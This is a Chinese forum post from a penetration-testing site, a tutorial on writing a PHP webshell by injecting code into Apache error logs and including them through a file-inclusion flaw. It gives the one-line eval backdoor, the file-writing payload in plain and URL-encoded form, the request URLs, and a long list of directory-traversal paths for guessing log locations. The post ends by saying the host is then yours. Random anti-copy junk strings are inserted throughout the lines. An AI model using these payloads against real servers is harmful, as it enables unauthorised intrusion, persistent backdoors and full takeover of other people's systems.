中国网络渗透测试联盟

标题: php包含apache日志写马 [打印本页]
作者: admin    时间: 2012-9-15 14:27
标题: php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 ! t# n, H' K; y9 C. D* U3 X) b
; n' o. o9 y$ X7 i5 N8 W
比如还是这句一句话木马 7 l5 N0 {6 `) Z. G6 }8 D0 n
<?eval($_POST[cmd]);?>   ; Z1 J! [4 I; V

6 \9 c1 W, Y' S+ d+ A8 y2 d( S到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
- |; \6 Y' D& r/ t/ _. ]fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 ' C" N" ^7 K/ Y! B- ]
- y! }& ]* V0 i. v8 ~5 _
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); 8 D' P5 U  t: m6 c* c
fclose($fp);?>   //在config.php里写入一句木马语句 ; K' j7 C& u3 }$ i

  ?/ ^( P% b; A( C9 O* ~我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
# K4 x# L4 ]* h  P8 g& ]转换为 1 j7 W: ]/ v5 s' _9 O: I
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F 4 Q4 T% O- A$ b8 P% ?
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
6 U. i6 F( v  n# ~' b4 v$ ~0 e5 H: m%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B ; n/ ^+ q; h9 B
fclose%28%24fp%29%3B%3F%3E
* i" {" j7 L7 m我们提交 5 b" u% z8 P- h+ D
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
3 Z% f. }0 B  M# j6 a! G/ a%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp 6 n4 |3 r) n* b% p9 |, K! t/ `9 A# h
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
$ h$ E8 P3 F' K2 icmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
0 g8 q/ m1 u5 ?# Q- s9 b$ s+ A; M8 C  d4 r6 _( a
这样就错误日志里就记录下了这行写入webshell的代码。 + s  f* }1 d, J
我们再来包含日志,提交
4 A# [1 X) T% i9 V: uhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log . D) h) U: j' d' i
2 N( O& }5 T  i& l$ Q, c
这样webshell就写入成功了,config.php里就写入一句木马语句
. K+ @7 m: i9 H6 \4 X( W8 r. ROK. 8 P( ]& a! M+ s1 j
http://www.xxx.com/forum/config.php这个就成了我们的webshell ) {8 l$ R  F+ y; W2 J
直接用lanker的客户端一连,主机就是你的了。
4 y5 Q. k1 I% n! A6 l# g+ h6 u6 @5 A+ g( e
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 2 u1 s6 C! O8 S* o( s" T
0 r! W! P- X3 x9 u: {, ^' @) |
其他的日志路径,你可以去猜,也可以参照这里。 * H: y$ e. k! P* Z
../../../../../../../../../../var/log/httpd/access_log 7 G) }8 l' ]" E; {0 ^
../../../../../../../../../../var/log/httpd/error_log
2 k6 q% `5 Y" Q- Q/ u" L../apache/logs/error.log
% A+ |1 c% i+ ]% O% \../apache/logs/access.log
! R2 @1 Q- o3 j7 b; N' K  e& X../../apache/logs/error.log
0 M$ u0 m: o- c- {5 a6 J% i9 O../../apache/logs/access.log
" j* P" p4 w1 B7 h( f8 Y../../../apache/logs/error.log 2 n' @  j/ o6 R
../../../apache/logs/access.log
, g$ D! |) p* {* w$ {../../../../../../../../../../etc/httpd/logs/acces_log
/ m& `% O" D8 N) u( j../../../../../../../../../../etc/httpd/logs/acces.log
5 J8 Y( j8 @9 W* a" r../../../../../../../../../../etc/httpd/logs/error_log
. j7 C3 g7 u' A% f, ?; r- h../../../../../../../../../../etc/httpd/logs/error.log
+ l8 B  X5 v; R& I0 ~7 d& @' N../../../../../../../../../../var/www/logs/access_log 9 J$ Z+ {# e, L2 f- S3 _7 d
../../../../../../../../../../var/www/logs/access.log
1 n, G! i0 @7 p../../../../../../../../../../usr/local/apache/logs/access_log $ C2 Z$ k! Z$ q. V1 L
../../../../../../../../../../usr/local/apache/logs/access.log
$ A% X# ^2 p( S8 S* p6 G../../../../../../../../../../var/log/apache/access_log
) A# ]! Y9 ^5 G1 v! w+ R, q' \../../../../../../../../../../var/log/apache/access.log
# s5 r8 o( R8 N../../../../../../../../../../var/log/access_log ) l# G) W1 `7 Z3 z4 A# @( q; }
../../../../../../../../../../var/www/logs/error_log
& Q" T5 a, t% q& q5 k../../../../../../../../../../var/www/logs/error.log . ]# X$ v& ?4 q+ g/ Z0 Z. e( c5 ~
../../../../../../../../../../usr/local/apache/logs/error_log / Y, }) r# {" d, x0 B& m4 k
../../../../../../../../../../usr/local/apache/logs/error.log
6 H4 z# `) o% |4 T! b; x! Z../../../../../../../../../../var/log/apache/error_log " T: d' N8 J# T3 v" Y( h
../../../../../../../../../../var/log/apache/error.log 1 j- _( B4 T4 ]4 n6 S- {
../../../../../../../../../../var/log/access_log % `8 J1 D- _) ^: ]8 b/ I- l
../../../../../../../../../../var/log/error_log
1 r! ?) _8 q& Y% L' G. J3 f/var/log/httpd/access_log         k' W) t& \' G- v! @
/var/log/httpd/error_log     - j# z7 J' m+ c1 T5 m  A
../apache/logs/error.log     6 O  ?- {% T: W* ]" i! N
../apache/logs/access.log
9 ~0 L  e  Y$ u. Z4 V../../apache/logs/error.log , k: r8 w3 {2 M: ^$ T
../../apache/logs/access.log
2 h5 t3 z  U9 T6 x../../../apache/logs/error.log " W  L6 a; r8 X% S: ^* R& e
../../../apache/logs/access.log
6 r6 i7 }" ?0 F0 _6 ^/etc/httpd/logs/acces_log
5 S! T& K8 d2 J9 o  ?/etc/httpd/logs/acces.log
3 ]" E' Y( N0 \8 B) s7 I) N/etc/httpd/logs/error_log
5 V, q, a) n( s  p/etc/httpd/logs/error.log
8 s2 d8 n6 I7 W/var/www/logs/access_log
5 L+ @' E: Z: }. _/var/www/logs/access.log & |3 w, S  B2 Q( u
/usr/local/apache/logs/access_log
$ P- R3 V) q9 I/usr/local/apache/logs/access.log
& S" V; _1 ~! q4 ~1 e/var/log/apache/access_log % P' F% K5 b2 Q% K9 R2 M
/var/log/apache/access.log
$ Y" |$ A6 r/ L% C5 w; A. z( @! b/var/log/access_log
: I0 L% n3 Y1 |  p) A/var/www/logs/error_log 3 m0 n4 [2 e6 r3 o
/var/www/logs/error.log
! T3 m( j# V7 S! g/usr/local/apache/logs/error_log
( b9 d: V9 u3 h: x$ l/usr/local/apache/logs/error.log
! m: o3 p6 \4 |: S4 k/var/log/apache/error_log % N/ [# w- Y- Z4 \8 u
/var/log/apache/error.log . U" D6 d& J: n0 _
/var/log/access_log
4 O! E2 M4 x" Q0 s# k/var/log/error_log



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2